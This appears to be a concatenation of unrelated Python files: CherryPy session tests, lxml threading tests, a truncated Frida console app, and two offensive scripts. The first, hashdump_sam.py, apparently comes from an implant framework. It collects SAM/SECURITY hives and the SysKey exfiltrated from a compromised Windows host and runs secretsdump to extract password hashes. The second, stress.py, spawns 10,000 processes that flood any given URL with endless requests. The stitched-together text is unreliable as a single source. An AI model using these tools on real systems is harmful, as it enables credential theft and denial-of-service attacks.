clear.exposed = True
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
data.exposed = True
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
testGen.exposed = True
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
testStr.exposed = True
def setsessiontype(self, newtype):
self.__class__._cp_config.update({'tools.sessions.storage_type': newtype})
if hasattr(cherrypy, "session"):
del cherrypy.session
cls = getattr(sessions, newtype.title() + 'Session')
if cls.clean_thread:
cls.clean_thread.stop()
cls.clean_thread.unsubscribe()
del cls.clean_thread
setsessiontype.exposed = True
setsessiontype._cp_config = {'tools.sessions.on': False}
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
index.exposed = True
def keyin(self, key):
return str(key in cherrypy.session)
keyin.exposed = True
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
delete.exposed = True
def delkey(self, key):
del cherrypy.session[key]
return "OK"
delkey.exposed = True
def blah(self):
return self._cp_config['tools.sessions.storage_type']
blah.exposed = True
def iredir(self):
raise cherrypy.InternalRedirect('/blah')
iredir.exposed = True
def restricted(self):
return cherrypy.request.method
restricted.exposed = True
restricted._cp_config = {'tools.allow.on': True,
'tools.allow.methods': ['GET']}
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
regen.exposed = True
def length(self):
return str(len(cherrypy.session))
length.exposed = True
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
session_cookie.exposed = True
session_cookie._cp_config = {
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False}
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/setsessiontype/file')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/setsessiontype/ram')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/setsessiontype/file')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("file")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()), set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
import socket
try:
import memcache
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/setsessiontype/memcached')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = v = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
hashdump_sam.py
|
import core.implant
import core.job
import core.cred_parser
class HashDumpSAMImplant(core.implant.Implant):
NAME = "SAM Hash Dump"
DESCRIPTION = "Dumps the SAM hive off the target system."
AUTHORS = ["zerosum0x0"]
def load(self):
self.options.register("LPATH", "/tmp/", "local file save path")
self.options.register("RPATH", "%TEMP%", "remote file save path")
def run(self):
payloads = {}
payloads["js"] = self.loader.load_script("data/implant/gather/hashdump_sam.js", self.options)
self.dispatch(payloads, HashDumpSAMJob)
class HashDumpSAMJob(core.job.Job):
def save_file(self, data):
import uuid
save_fname = self.options.get("LPATH") + "/" + uuid.uuid4().hex
save_fname = save_fname.replace("//", "/")
with open(save_fname, "wb") as f:
data = self.decode_downloaded_data(data)
f.write(data)
return save_fname
def report(self, handler, data, sanitize = False):
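# The implant posts each artifact in its own HTTP request; the "Task" header tells
# us which piece (SAM hive, SysKey blob, SECURITY hive) the request body carries.
# A request without one of those Task values means all parts are in, so decoding
# is handed off to a background thread via finish_up().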
task = handler.get_header("Task", False)
if task == "SAM":
handler.reply(200)
self.print_status("received SAM hive (%d bytes)" % len(data))
self.sam_data = data
return
# if task == "SYSTEM":
# handler.reply(200)
# self.print_status("received SYSTEM hive (%d bytes)" % len(data))
# self.system_data = data
# return
if task == "SysKey":
handler.reply(200)
self.print_status("received SysKey (%d bytes)" % len(data))
self.syskey_data = data
return
if task == "SECURITY":
handler.reply(200)
self.print_status("received SECURITY hive (%d bytes)" % len(data))
self.security_data = data
return
# dump sam here
import threading
self.finished = False
threading.Thread(target=self.finish_up).start()
handler.reply(200)
def finish_up(self):
from subprocess import Popen, PIPE, STDOUT
# p = Popen(["which", "secretsdump.py"], stdout=PIPE)
# path = p.communicate()[0].strip()
# path = path.decode() if type(path) is bytes else path
# if not path:
# print("Error decoding: secretsdump.py not in PATH!")
# return
path = "data/bin/secretsdump/secretsdump.py"
self.sam_file = self.save_file(self.sam_data)
self.print_status("decoded SAM hive (%s)" % self.sam_file)
self.security_file = self.save_file(self.security_data)
self.print_status("decoded SECURITY hive (%s)" % self.security_file)
# self.system_file = self.save_file(self.system_data)
# self.print_status("decoded SYSTEM hive (%s)" % self.system_file)
self.syskey_data_file = self.save_file(self.syskey_data)
tmp_syskey = ""
self.syskey = ""
with open(self.syskey_data_file, 'rb') as syskeyfile:
file_contents = syskeyfile.read()
i = 4220
while i < 28811:
j = i + 15
while i < j:
tmp_syskey += file_contents[i:i+1].decode()
i += 2
i += 8176
tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2)))
transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
for i in transforms:
self.syskey += tmp_syskey[i]
self.print_status("decoded SysKey: 0x%s" % self.syskey)
# cmd = ['python2', path, '-sam', self.sam_file, '-system', self.system_file, '-security', self.security_file, 'LOCAL']
cmd = ['python2', path, '-sam', self.sam_file, '-bootkey', self.syskey, '-security', self.security_file, 'LOCAL']
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
output = p.stdout.read().decode()
self.shell.print_plain(output)
cp = core.cred_parser.CredParse(self)
cp.parse_hashdump_sam(output)
super(HashDumpSAMJob, self).report(None, "", False)
def done(self):
#self.display()
pass
def display(self):
pass
|
test_threading.py
|
# -*- coding: utf-8 -*-
"""
Tests for thread usage in lxml.etree.
"""
import unittest, threading, sys, os.path
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
sys.path.insert(0, this_dir) # needed for Py3
from common_imports import etree, HelperTestCase, BytesIO, _bytes
try:
from Queue import Queue
except ImportError:
from queue import Queue # Py3
class ThreadingTestCase(HelperTestCase):
"""Threading tests"""
etree = etree
def _run_thread(self, func):
thread = threading.Thread(target=func)
thread.start()
thread.join()
def test_subtree_copy_thread(self):
tostring = self.etree.tostring
XML = self.etree.XML
xml = _bytes("<root><threadtag/></root>")
main_root = XML(_bytes("<root/>"))
def run_thread():
thread_root = XML(xml)
main_root.append(thread_root[0])
del thread_root
self._run_thread(run_thread)
self.assertEqual(xml, tostring(main_root))
def test_main_xslt_in_thread(self):
XML = self.etree.XML
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<foo><xsl:copy><xsl:value-of select="/a/b/text()" /></xsl:copy></foo>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
result = []
def run_thread():
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
result.append( st(root) )
self._run_thread(run_thread)
self.assertEqual('''\
<?xml version="1.0"?>
<foo><a>B</a></foo>
''',
str(result[0]))
def test_thread_xslt(self):
XML = self.etree.XML
tostring = self.etree.tostring
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
def run_thread():
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<foo><xsl:copy><xsl:value-of select="/a/b/text()" /></xsl:copy></foo>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
root.append( st(root).getroot() )
self._run_thread(run_thread)
self.assertEqual(_bytes('<a><b>B</b><c>C</c><foo><a>B</a></foo></a>'),
tostring(root))
def test_thread_xslt_attr_replace(self):
# this is the only case in XSLT where the result tree can be
# modified in-place
XML = self.etree.XML
tostring = self.etree.tostring
style = self.etree.XSLT(XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<root class="abc">
<xsl:copy-of select="@class" />
<xsl:attribute name="class">xyz</xsl:attribute>
</root>
</xsl:template>
</xsl:stylesheet>''')))
result = []
def run_thread():
root = XML(_bytes('<ROOT class="ABC" />'))
result.append( style(root).getroot() )
self._run_thread(run_thread)
self.assertEqual(_bytes('<root class="xyz"/>'),
tostring(result[0]))
def test_thread_create_xslt(self):
XML = self.etree.XML
tostring = self.etree.tostring
root = XML(_bytes('<a><b>B</b><c>C</c></a>'))
stylesheets = []
def run_thread():
style = XML(_bytes('''\
<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="xml" />
<xsl:template match="/">
<div id="test">
<xsl:apply-templates/>
</div>
</xsl:template>
</xsl:stylesheet>'''))
stylesheets.append( etree.XSLT(style) )
self._run_thread(run_thread)
st = stylesheets[0]
result = tostring( st(root) )
self.assertEqual(_bytes('<div id="test">BC</div>'),
result)
def test_thread_error_log(self):
XML = self.etree.XML
ParseError = self.etree.ParseError
expected_error = [self.etree.ErrorTypes.ERR_TAG_NAME_MISMATCH]
children = "<a>test</a>" * 100
def parse_error_test(thread_no):
tag = "tag%d" % thread_no
xml = "<%s>%s</%s>" % (tag, children, tag.upper())
parser = self.etree.XMLParser()
for _ in range(10):
errors = None
try:
XML(xml, parser)
except self.etree.ParseError:
e = sys.exc_info()[1]
errors = e.error_log.filter_types(expected_error)
self.assertTrue(errors, "Expected error not found")
for error in errors:
self.assertTrue(
tag in error.message and tag.upper() in error.message,
"%s and %s not found in '%s'" % (
tag, tag.upper(), error.message))
self.etree.clear_error_log()
threads = []
for thread_no in range(1, 10):
t = threading.Thread(target=parse_error_test,
args=(thread_no,))
threads.append(t)
t.start()
parse_error_test(0)
for t in threads:
t.join()
def test_thread_mix(self):
XML = self.etree.XML
Element = self.etree.Element
SubElement = self.etree.SubElement
tostring = self.etree.tostring
xml = _bytes('<a><b>B</b><c xmlns="test">C</c></a>')
root = XML(xml)
fragment = XML(_bytes("<other><tags/></other>"))
result = self.etree.Element("{myns}root", att = "someval")
def run_XML():
thread_root = XML(xml)
result.append(thread_root[0])
result.append(thread_root[-1])
def run_parse():
thread_root = self.etree.parse(BytesIO(xml)).getroot()
result.append(thread_root[0])
result.append(thread_root[-1])
def run_move_main():
result.append(fragment[0])
def run_build():
result.append(
Element("{myns}foo", attrib={'{test}attr':'val'}))
SubElement(result, "{otherns}tasty")
def run_xslt():
style = XML(_bytes('''\
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="*">
<xsl:copy><foo><xsl:value-of select="/a/b/text()" /></foo></xsl:copy>
</xsl:template>
</xsl:stylesheet>'''))
st = etree.XSLT(style)
result.append( st(root).getroot() )
for test in (run_XML, run_parse, run_move_main, run_xslt, run_build):
tostring(result)
self._run_thread(test)
self.assertEqual(
_bytes('<ns0:root xmlns:ns0="myns" att="someval"><b>B</b>'
'<c xmlns="test">C</c><b>B</b><c xmlns="test">C</c><tags/>'
'<a><foo>B</foo></a>'
'<ns0:foo xmlns:ns1="test" ns1:attr="val"/>'
'<ns1:tasty xmlns:ns1="otherns"/></ns0:root>'),
tostring(result))
def strip_first():
root = Element("newroot")
root.append(result[0])
while len(result):
self._run_thread(strip_first)
self.assertEqual(
_bytes('<ns0:root xmlns:ns0="myns" att="someval"/>'),
tostring(result))
def test_concurrent_proxies(self):
XML = self.etree.XML
root = XML(_bytes('<root><a>A</a><b xmlns="test">B</b><c/></root>'))
child_count = len(root)
def testrun():
for i in range(10000):
el = root[i%child_count]
del el
threads = [ threading.Thread(target=testrun)
for _ in range(10) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_concurrent_class_lookup(self):
XML = self.etree.XML
class TestElement(etree.ElementBase):
pass
class MyLookup(etree.CustomElementClassLookup):
repeat = range(100)
def lookup(self, t, d, ns, name):
count = 0
for i in self.repeat:
# allow other threads to run
count += 1
return TestElement
parser = self.etree.XMLParser()
parser.set_element_class_lookup(MyLookup())
root = XML(_bytes('<root><a>A</a><b xmlns="test">B</b><c/></root>'),
parser)
child_count = len(root)
def testrun():
for i in range(1000):
el = root[i%child_count]
del el
threads = [ threading.Thread(target=testrun)
for _ in range(10) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ThreadPipelineTestCase(HelperTestCase):
"""Threading tests based on a thread worker pipeline.
"""
etree = etree
item_count = 20
class Worker(threading.Thread):
def __init__(self, in_queue, in_count, **kwargs):
threading.Thread.__init__(self)
self.in_queue = in_queue
self.in_count = in_count
self.out_queue = Queue(in_count)
self.__dict__.update(kwargs)
def run(self):
get, put = self.in_queue.get, self.out_queue.put
handle = self.handle
for _ in range(self.in_count):
put(handle(get()))
class ParseWorker(Worker):
etree = etree
def handle(self, xml):
return self.etree.XML(xml)
class RotateWorker(Worker):
def handle(self, element):
first = element[0]
element[:] = element[1:]
element.append(first)
return element
class ReverseWorker(Worker):
def handle(self, element):
element[:] = element[::-1]
return element
class ParseAndExtendWorker(Worker):
etree = etree
def handle(self, element):
element.extend(self.etree.XML(self.xml))
return element
class SerialiseWorker(Worker):
def handle(self, element):
return etree.tostring(element)
xml = _bytes('''\
<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="xml" />
<xsl:template match="/">
<div id="test">
<xsl:apply-templates/>
</div>
</xsl:template>
</xsl:stylesheet>''')
def _build_pipeline(self, item_count, *classes, **kwargs):
in_queue = Queue(item_count)
start = last = classes[0](in_queue, item_count, **kwargs)
start.setDaemon(True)
for worker_class in classes[1:]:
last = worker_class(last.out_queue, item_count, **kwargs)
last.setDaemon(True)
last.start()
return (in_queue, start, last)
def test_thread_pipeline_thread_parse(self):
item_count = self.item_count
# build and start the pipeline
in_queue, start, last = self._build_pipeline(
item_count,
self.ParseWorker,
self.RotateWorker,
self.ReverseWorker,
self.ParseAndExtendWorker,
self.SerialiseWorker,
xml = self.xml)
# fill the queue
put = start.in_queue.put
for _ in range(item_count):
put(self.xml)
# start the first thread and thus everything
start.start()
# make sure the last thread has terminated
last.join(60) # time out after 60 seconds
self.assertEqual(item_count, last.out_queue.qsize())
# read the results
get = last.out_queue.get
results = [ get() for _ in range(item_count) ]
comparison = results[0]
for i, result in enumerate(results[1:]):
self.assertEqual(comparison, result)
def test_thread_pipeline_global_parse(self):
item_count = self.item_count
XML = self.etree.XML
# build and start the pipeline
in_queue, start, last = self._build_pipeline(
item_count,
self.RotateWorker,
self.ReverseWorker,
self.ParseAndExtendWorker,
self.SerialiseWorker,
xml = self.xml)
# fill the queue
put = start.in_queue.put
for _ in range(item_count):
put(XML(self.xml))
# start the first thread and thus everything
start.start()
# make sure the last thread has terminated
last.join(60) # time out after 60 seconds
self.assertEqual(item_count, last.out_queue.qsize())
# read the results
get = last.out_queue.get
results = [ get() for _ in range(item_count) ]
comparison = results[0]
for i, result in enumerate(results[1:]):
self.assertEqual(comparison, result)
def test_suite():
suite = unittest.TestSuite()
suite.addTests([unittest.makeSuite(ThreadingTestCase)])
suite.addTests([unittest.makeSuite(ThreadPipelineTestCase)])
return suite
if __name__ == '__main__':
print('to test use test.py %s' % __file__)
|
stress.py
|
#!/usr/bin/python3
"""
A web stressor to test your infrastructure
"""
from multiprocessing import Process
import requests
# send a request
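# each worker process loops forever issuing GET requests; there is no rate limiting
# and no graceful shutdown, so the run has to be stopped externally (Ctrl-C / kill)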
def send_request(url):
while True:
requests.get(url)
if __name__ == "__main__":
conn_pool = []
url = input("what url do you want to send to: ")
for i in range(10000):
print(i)
Process(target=send_request, args=(url,)).start()
|
application.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import codecs
import collections
import errno
import numbers
from optparse import OptionParser
import os
import platform
import re
import select
import shlex
import signal
import sys
import threading
import time
if platform.system() == 'Windows':
import msvcrt
import colorama
from colorama import Cursor, Fore, Style
import frida
AUX_OPTION_PATTERN = re.compile(r"(.+)=\((string|bool|int)\)(.+)")
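# e.g. "uid=(int)42" -> name "uid", declared type "int", raw value "42"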
def input_with_cancellable(cancellable):
if platform.system() == 'Windows':
result = ""
done = False
while not done:
while msvcrt.kbhit():
c = msvcrt.getwche()
if c in ("\x00", "\xe0"):
msvcrt.getwche()
continue
result += c
if c == "\n":
done = True
break
cancellable.raise_if_cancelled()
time.sleep(0.05)
return result
else:
with cancellable.get_pollfd() as cancellable_fd:
try:
rlist, _, _ = select.select([sys.stdin, cancellable_fd], [], [])
except (OSError, select.error) as e:
if e.args[0] != errno.EINTR:
raise e
cancellable.raise_if_cancelled()
return sys.stdin.readline()
def await_enter(reactor):
try:
input_with_cancellable(reactor.ui_cancellable)
except frida.OperationCancelledError:
pass
except KeyboardInterrupt:
print("")
class ConsoleState:
EMPTY = 1
STATUS = 2
TEXT = 3
class ConsoleApplication(object):
def __init__(self, run_until_return=await_enter, on_stop=None):
plain_terminal = os.environ.get("TERM", "").lower() == "none"
colorama.init(strip=True if plain_terminal else None)
parser = OptionParser(usage=self._usage(), version=frida.__version__)
if self._needs_device():
parser.add_option("-D", "--device", help="connect to device with the given ID",
metavar="ID", type='string', action='store', dest="device_id", default=None)
parser.add_option("-U", "--usb", help="connect to USB device",
action='store_const', const='usb', dest="device_type", default=None)
parser.add_option("-R", "--remote", help="connect to remote frida-server",
action='store_const', const='remote', dest="device_type", default=None)
parser.add_option("-H", "--host", help="connect to remote frida-server on HOST",
metavar="HOST", type='string', action='store', dest="host", default=None)
if self._needs_target():
def store_target(option, opt_str, target_value, parser, target_type, *args, **kwargs):
if target_type == 'file':
target_value = [target_value]
setattr(parser.values, 'target', (target_type, target_value))
parser.add_option("-f", "--file", help="spawn FILE", metavar="FILE",
type='string', action='callback', callback=store_target, callback_args=('file',))
parser.add_option("-F", "--attach-frontmost", help="attach to frontmost application",
action='callback', callback=store_target, callback_args=('frontmost',))
parser.add_option("-n", "--attach-name", help="attach to NAME", metavar="NAME",
type='string', action='callback', callback=store_target, callback_args=('name',))
parser.add_option("-p", "--attach-pid", help="attach to PID", metavar="PID",
type='int', action='callback', callback=store_target, callback_args=('pid',))
parser.add_option("--stdio", help="stdio behavior when spawning (defaults to “inherit”)", metavar="inherit|pipe",
type='choice', choices=['inherit', 'pipe'], default='inherit')
parser.add_option("--aux", help="set aux option when spawning, such as “uid=(int)42” (supported types are: string, bool, int)", metavar="option",
type='string', action='append', dest="aux", default=[])
parser.add_option("--runtime", help="script runtime to use", metavar="duk|v8",
type='choice', choices=['duk', 'v8'], default=None)
parser.add_option("--debug", help="enable the Node.js compatible script debugger",
action='store_true', dest="enable_debugger", default=False)
parser.add_option("--squelch-crash", help="if enabled, will not dump crash report to console",
action='store_true', dest="squelch_crash", default=False)
parser.add_option("-O", "--options-file", help="text file containing additional command line options",
metavar="FILE", type='string', action='store')
self._add_options(parser)
real_args = compute_real_args(parser)
(options, args) = parser.parse_args(real_args)
if sys.version_info[0] < 3:
input_encoding = sys.stdin.encoding or 'UTF-8'
args = [arg.decode(input_encoding) for arg in args]
if self._needs_device():
self._device_id = options.device_id
self._device_type = options.device_type
self._host = options.host
else:
self._device_id = None
self._device_type = None
self._host = None
self._device = None
self._schedule_on_output = lambda pid, fd, data: self._reactor.schedule(lambda: self._on_output(pid, fd, data))
self._schedule_on_device_lost = lambda: self._reactor.schedule(self._on_device_lost)
self._spawned_pid = None
self._spawned_argv = None
self._target_pid = None
self._session = None
if self._needs_target():
self._stdio = options.stdio
self._aux = options.aux
self._runtime = options.runtime
self._enable_debugger = options.enable_debugger
self._squelch_crash = options.squelch_crash
else:
self._stdio = 'inherit'
self._aux = []
self._runtime = 'duk'
self._enable_debugger = False
self._squelch_crash = False
self._schedule_on_session_detached = lambda reason, crash: self._reactor.schedule(lambda: self._on_session_detached(reason, crash))
self._started = False
self._resumed = False
self._reactor = Reactor(run_until_return, on_stop)
self._exit_status = None
self._console_state = ConsoleState.EMPTY
self._have_terminal = sys.stdin.isatty() and sys.stdout.isatty() and not os.environ.get("TERM", '') == "dumb"
self._plain_terminal = plain_terminal
self._quiet = False
if sum(map(lambda v: int(v is not None), (self._device_id, self._device_type, self._host))) > 1:
parser.error("Only one of -D, -U, -R, and -H may be specified")
if self._needs_target():
target = getattr(options, 'target', None)
if target is None:
if len(args) < 1:
parser.error("target file, process name or pid must be specified")
target = infer_target(args[0])
args.pop(0)
target = expand_target(target)
if target[0] == 'file':
argv = target[1]
argv.extend(args)
args = []
self._target = target
else:
self._target = None
try:
self._initialize(parser, options, args)
except Exception as e:
parser.error(str(e))
def run(self):
mgr = frida.get_device_manager()
on_devices_changed = lambda: self._reactor.schedule(self._try_start)
mgr.on('changed', on_devices_changed)
self._reactor.schedule(self._try_start)
self._reactor.schedule(self._show_message_if_no_device, delay=1)
signal.signal(signal.SIGTERM, self._on_sigterm)
self._reactor.run()
if self._started:
try:
self._perform_on_background_thread(self._stop)
except frida.OperationCancelledError:
pass
if self._session is not None:
self._session.off('detached', self._schedule_on_session_detached)
try:
self._perform_on_background_thread(self._session.detach)
except frida.OperationCancelledError:
pass
self._session = None
if self._device is not None:
self._device.off('output', self._schedule_on_output)
self._device.off('lost', self._schedule_on_device_lost)
mgr.off('changed', on_devices_changed)
frida.shutdown()
sys.exit(self._exit_status)
def _add_options(self, parser):
pass
def _initialize(self, parser, options, args):
pass
def _needs_device(self):
return True
def _needs_target(self):
return False
def _start(self):
pass
def _stop(self):
pass
def _resume(self):
if self._resumed:
return
if self._spawned_pid is not None:
self._device.resume(self._spawned_pid)
self._resumed = True
def _exit(self, exit_status):
self._exit_status = exit_status
self._reactor.stop()
def _try_start(self):
if self._device is not None:
return
if self._device_id is not None:
try:
self._device = frida.get_device(self._device_id)
except:
self._update_status("Device '%s' not found" % self._device_id)
self._exit(1)
return
elif self._device_type is not None:
self._device = find_device(self._device_type)
if self._device is None:
return
elif self._host is not None:
